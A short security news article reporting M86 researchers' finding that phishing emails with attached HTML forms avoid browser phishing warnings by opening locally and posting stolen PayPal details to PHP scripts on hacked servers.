Phishing HTML attachments bypass browser detection

In the constant war that goes on between online crooks and scammers and security professionals, adaptability is a quality greatly prized by all. All of them are tied together in an action-reaction circle, even though security pros are at a disadvantage because they are stuck in an almost perpetual defensive role.

For someone like me who follows security issues closely, it is fascinating to watch how certain scams are modified over time.

Take, for example, the typical phishing scam. More often than not, this type of scam would start with an e-mail containing an embedded link to the phishing page. If the victim failed to spot that the e-mail doesn’t come from a legitimate source or that the page he or she landed on was spoofed, the cyber crooks won the day.

But, as much as we’re all trying to educate computer users about the various online scams, there are always those who will forget about it and click away.

It is a very good thing, then, that browsers like Firefox and Chrome are becoming more and more adept at spotting phishing pages. Indeed, they have become so successful that phishers are, once again, forced to find a new tactic.

And, according to M86 researchers, it consists of including an HTML file to e-mails, which will be stored locally when downloaded and will successfully open itself in the browser without triggering warnings:

“When the victims enter their information and click the ‘Agree and Submit’ button, the HTML form sends the stolen information through a POST request to a PHP script hosted on a hacked legitimate webserver,” explains the M86 researcher.

“The phisher’s PHP script then redirects the browser to Paypal’s homepage after successfully submitting stolen information. While the POST request sends information to the phisher’s remote web server, Google Chrome and Mozilla Firefox did not detect any malicious activity.”

And even if logic dictates that the browsers should be able to detect a URL when the browser sends the POST request, it doesn’t because – among other things – few PHP URLs are reported as abuse since the URL isn’t visible and it takes some technical knowledge to know it can be found HTML source code.

Also, since the PHP script for the form runs on the server and there is not visible HTM once the submit button is pressed, the URLs in questions are difficult to verify as phishing sites.

It seems that – once again – the ball is in the security pros’ court.

Don't miss